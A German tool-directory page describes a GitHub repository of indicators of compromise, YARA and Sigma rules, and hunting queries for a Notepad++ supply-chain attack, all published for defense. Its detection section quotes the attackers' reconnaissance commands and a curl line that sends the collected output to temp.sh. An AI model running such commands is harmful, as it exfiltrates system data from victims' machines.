Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
notepadpp-supply-chain-iocs — IoCs und Erkennungsregeln für den Notepad++ Supply-Chain-Angriff (CVE-2025-15556) — Lotus Blossom APT, Juni–Dezember 2025. Beinhaltet Falcon LogScale-Abfragen, YARA/Sigma-Regeln und MITRE ATT&CK Mapping. | Kitploit
Tools/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Management von Indicators of Compromise (IOC)Bedrohungsfeeds & AggregatorenSchwachstellenanalyseForensikMalware-AnalyseBedrohungsanalyseLieferkettensicherheitLernen & BildungIncident Response

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoCs und Erkennungsregeln für den Notepad++ Supply-Chain-Angriff (CVE-2025-15556) — Lotus Blossom APT, Juni–Dezember 2025. Beinhaltet Falcon LogScale-Abfragen, YARA/Sigma-Regeln und MITRE ATT&CK Mapping.

Repository anzeigen
14vor 7 MonatenNoch nicht geprüft
Teilen

Notepad++ Supply-Chain-Angriff — IoC-Repository

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Juni – Dezember 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Überblick

Dieses Repository enthält eine umfassende, konsolidierte Sammlung von Indikatoren für Kompromittierung (IoCs) im Zusammenhang mit dem Notepad++-Supply-Chain-Angriff, der am 2. Februar 2026 offengelegt wurde.

Zwischen Juni und Dezember 2025 kompromittierte ein chinesischer staatlich geförderter Bedrohungsakteur die Hosting-Infrastruktur von Notepad++, kaperte den integrierten Update-Mechanismus (WinGUp) und lieferte selektiv trojanisierte Installer an gezielte Benutzer aus. Der Angriff nutzte das Fehlen einer kryptografischen Prüfung im Updater (vor v8.8.9) aus und ermöglichte die Verteilung von individuellen Backdoors, Cobalt Strike Beacons und Metasploit-Payloads.

Wichtige Fakten

CVECVE-2025-15556 — Herunterladen von Code ohne Integritätsprüfung
BedrohungsakteurLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Aktiver ZeitraumJuni 2025 – 2. Dezember 2025
AngriffsvektorSupply-Chain-Kompromittierung über den WinGUp-Autoupdater
ZieleRegierung, Telekommunikation, Finanzdienstleistungen, IT-Dienstleister (Philippinen, Vietnam, El Salvador, Australien, Ostasien)
MalwareChrysalis-Backdoor (eigen entwickelt), Cobalt Strike Beacon, Metasploit Meterpreter
Behoben inNotepad++ v8.8.9+ (Zertifikatsprüfung) / v8.9.1+ (XMLDSig-Validierung)

Infektionsketten

Kaspersky GReAT identifizierte drei unterschiedliche Infektionsketten, die etwa monatlich rotiert wurden, um der Erkennung zu entgehen:

Kette #1 — Juli/August 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → ProShow.exe (legitim) → Exploit über „load"-Datei
  → Metasploit-Downloader → Cobalt Strike Beacon
  • Nutzt eine alte Schwachstelle in der ProShow-Software anstelle von DLL-Sideloading
  • Aufklärung: whoami && tasklist → exfiltriert über temp.sh
  • Arbeitsverzeichnis: %appdata%\ProShow\

Kette #2 — September/Oktober 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → script.exe (Lua-Interpreter) → alien.ini (kompiliertes Lua)
  → Shellcode über EnumWindowStationsW → Metasploit-Downloader → Cobalt Strike Beacon
  • Verwendet einen legitimen Lua-Interpreter zur Ausführung von kompiliertem Shellcode
  • Erweiterte Aufklärung: whoami && tasklist && systeminfo && netstat -ano
  • Arbeitsverzeichnis: %appdata%\Adobe\Scripts\

Kette #3 — Oktober 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitim) → log.dll (gesideloadet)
  → entschlüsselt „BluetoothService"-Shellcode → Chrysalis-Backdoor
  • Klassische DLL-Sideloading-Technik
  • Keine integrierte Aufklärung (anders als bei Kette 1 und 2)
  • Arbeitsverzeichnis: %appdata%\Bluetooth\
  • Zugehöriger Cobalt Strike Beacon gefunden in C:\ProgramData\USOShared\
root@kitploit:~
                     ┌─────────────────────────────────────────────────────────┐
                     │              KOMPROMITTIERUNGS-ZEITSTRAHL                │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Okt 25 │  Nov 25 │Dez 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Kette #1 (ProShow) │████████████████████                                    │
  Kette #2 (Lua)     │                    █████████████████████████████        │
  Kette #3 (DLL SL)  │                              ██████████████            │
  Infra-Zugriff      │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Repository-Inhalte

DateiBeschreibung
notepadpp_supply_chain_iocs.csvVollständiger IoC-Datensatz (105 Indikatoren) mit MITRE ATT&CK-Zuordnung

CSV-Schema

SpalteBeschreibung
ioc_typeTyp: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueDer Indikatorwert
chainInfektionskette (1, 2, 3, 1/2, 2/3, all, n/a)
contextBeschreibung, wofür der IoC steht
sourceNachrichtenquelle (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSchweregrad (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueMITRE ATT&CK-Technik-ID

Erkennung & Bedrohungsjagd

Prioritätsindikatoren (hier beginnen)

Verhaltensbasiert – IoC-agnostisch, höchster Wert:

  • gup.exe startet einen untergeordneten Prozess, der kein legitimer signierter Notepad++-Installer ist
  • gup.exe stellt Verbindungen zu Domains/IPs her, die nicht notepad-plus-plus.org, github.com, release-assets.githubusercontent.com sind
  • Erstellung von Verzeichnissen: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Erstellung von %localappdata%\Temp\ns.tmp\ (NSIS-Laufzeit – in allen Ketten vorhanden)

Netzwerk – hohe Zuversicht:

  • DNS-Auflösung von cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Verbindungen zu temp.sh (51.91.79.17) – insbesondere mit Dateiupload über curl
  • HTTP-Anfragen mit temp.sh-URLs im User-Agent-Header
  • Ausgehende Verbindungen zu 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Aufklärungsbefehle (nach Exploitation):

root@kitploit:~
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

CrowdStrike Falcon LogScale-Abfragen

Verhaltensbasiert: Jagd auf GUP.exe-Unterprozesse
root@kitploit:~
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Multi-IoC-Jagd über Prozess-, Netzwerk- und DNS-Ereignisse
root@kitploit:~
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // Malicious IPs
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Malicious Domains
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // Suspicious filenames
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Suspicious DLLs
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Chain-specific artifacts
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
NSIS-Installer-Erkennung (alle Ketten)
root@kitploit:~
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

YARA-Regel (NSIS + Aufklärungsmuster)

YARA-Regel für schädliche NSIS-Updater
root@kitploit:~
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Detects malicious NSIS installers from Notepad++ supply chain attack"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Sigma-Regeln

Sigma: GUP.exe verdächtiger Unterprozess
root@kitploit:~
title: Notepad++ GUP.exe Suspicious Child Process
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects GUP.exe (Notepad++ updater) spawning suspicious child processes indicative of supply chain compromise
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.initial_access
    - attack.t1195.002
    - cve.2025.15556
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\gup.exe'
    filter_legitimate:
        Image|endswith:
            - '\npp.Installer.x64.exe'
            - '\npp.Installer.exe'
    condition: selection_parent and not filter_legitimate
falsepositives:
    - Legitimate Notepad++ installers with non-standard naming
level: high
Sigma: Aufklärungsbefehle mit temp.sh-Exfiltration
root@kitploit:~
title: Reconnaissance Data Exfiltration via temp.sh
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Detects system reconnaissance followed by data upload to temp.sh, as observed in Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
tags:
    - attack.exfiltration
    - attack.t1567
    - attack.discovery
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        CommandLine|contains:
            - 'temp.sh/upload'
            - 'temp.sh'
        Image|endswith: '\curl.exe'
    condition: selection_curl
falsepositives:
    - Legitimate use of temp.sh file sharing service (rare in corporate environments)
level: high
Sigma: Auflösung schädlicher Domains
root@kitploit:~
title: Notepad++ Supply Chain C2 Domain Resolution
id: c3d4e5f6-a7b8-9012-cdef-123456789012
status: experimental
description: Detects DNS resolution of C2 domains associated with the Notepad++ supply chain attack
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - 'cdncheck.it.com'
            - 'safe-dns.it.com'
            - 'self-dns.it.com'
            - 'api.skycloudcenter.com'
            - 'api.wiresguard.com'
    condition: selection
falsepositives:
    - Very unlikely in corporate environments
level: critical

MITRE ATT&CK-Zuordnung

TaktikTechnikIDVerwendung in dieser Kampagne
Erster ZugriffSupply-Chain-Kompromittierung: Kompromittierung der Software-LieferketteT1195.002Gekaperter WinGUp-Update-Mechanismus
AusführungBefehl und Skript-Interpreter: Windows-BefehlsshellT1059.003Aufklärung über cmd.exe
AusführungBefehl und Skript-Interpreter: Python/LuaT1059.006Kette #2 Lua-Interpreter
AusführungAusnutzung zur Client-AusführungT1203Kette #1 ProShow-Schwachstelle
AusführungNative APIT1106EnumWindowStationsW zur Shellcode-Ausführung
PersistenzHijacking des Ausführungsflusses: DLL-SideloadingT1574.002Kette #3 log.dll-Sideloading
Umgehung der VerteidigungVerschleierte Dateien oder InformationenT1027Verschlüsselter Shellcode, XOR-Schlüssel "CRAZY"
Umgehung der VerteidigungTarnung: Übereinstimmender legitimer NameT1036.005BluetoothService.exe, update.exe, AutoUpdater.exe
EntdeckungSysteminformationsermittlungT1082whoami, systeminfo, tasklist, netstat
SammlungDaten bereitgestellt: Lokale DatenbereitstellungT1074.001Aufklärungsausgabe in .txt-Dateien gespeichert
Kommando und KontrolleAnwendungsschichtprotokoll: WebprotokolleT1071.001HTTPS-C2 über Cobalt Strike, Chrysalis

Referenzen

QuelleLink
Kaspersky GReAT — Unnoticed execution chains and new IoCssecurelist.com
Rapid7 — Chrysalis Backdoor: Dive into Lotus Blossom's Toolkitrapid7.com
Notepad++ Official Disclosure — Hijacked Incident Info Updatenotepad-plus-plus.org
Kevin Beaumont — Initial disclosure and attributionDoublePulsar
Tenable — FAQ about Notepad++ Supply Chain Compromisetenable.com
Orca Security — Update Hijack Analysis & Remediationorca.security
CSO Online — Chinese APT sophisticated supply chain attackcsoonline.com

Sofortmaßnahmen

  1. Identifizieren Sie alle Endpunkte mit installiertem Notepad++ (jede Version < 8.9.1)
  2. Jagen Sie nach gup.exe, das zwischen Juni und Dezember 2025 unerwartete untergeordnete Prozesse gestartet hat
  3. Durchsuchen Sie Netzwerkprotokolle auf Verbindungen zu den oben aufgeführten C2-Domains und IPs
  4. Überprüfen Sie auf die Dateisystem-Artefakte (%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\)
  5. Aktualisieren Sie Notepad++ auf v8.9.1+ mit einem manuell heruntergeladenen Installer von den offiziellen GitHub-Releases
  6. Entfernen Sie alle alten benutzerdefinierten Stammzertifikate, die von früheren Notepad++-Versionen installiert wurden
  7. Isolieren und triagieren Sie jeden Endpunkt mit positiven Indikatoren

Änderungsprotokoll

DatumÄnderung
2026-02-09Erste Veröffentlichung — 105 IoCs konsolidiert aus Kaspersky, Rapid7, CrowdStrike, Tenable

Lizenz

Dieses Repository wird unter der MIT-Lizenz bereitgestellt. IoCs werden zu defensiven Zwecken aus öffentlichen Quellen aggregiert.


Beitrag leisten

Beiträge sind willkommen. Wenn Sie zusätzliche IoCs, Erkennungsregeln oder Korrekturen haben:

  1. Forken Sie das Repository
  2. Fügen Sie Ihre Indikatoren zur CSV hinzu (unter Beibehaltung des Schemas)
  3. Reichen Sie einen Pull-Request mit Verweisen auf die Quelle ein

Haftungsausschluss: Dieses Repository dient ausschließlich defensiven Cybersicherheitszwecken. Die IoCs und Erkennungsregeln werden wie besehen bereitgestellt, um Organisationen dabei zu helfen, ihre Gefährdung durch diese Supply-Chain-Kompromittierung zu bewerten.

Tool herunterladen
Kommando und KontrolleVerschlüsselter KanalT1573CS Beacon verschlüsselte Konfiguration
Kommando und KontrolleEindringen von Werkzeugen übertragenT1105Metasploit-Downloader ruft CS Beacon ab
ExfiltrationExfiltration über WebdienstT1567Upload zu temp.sh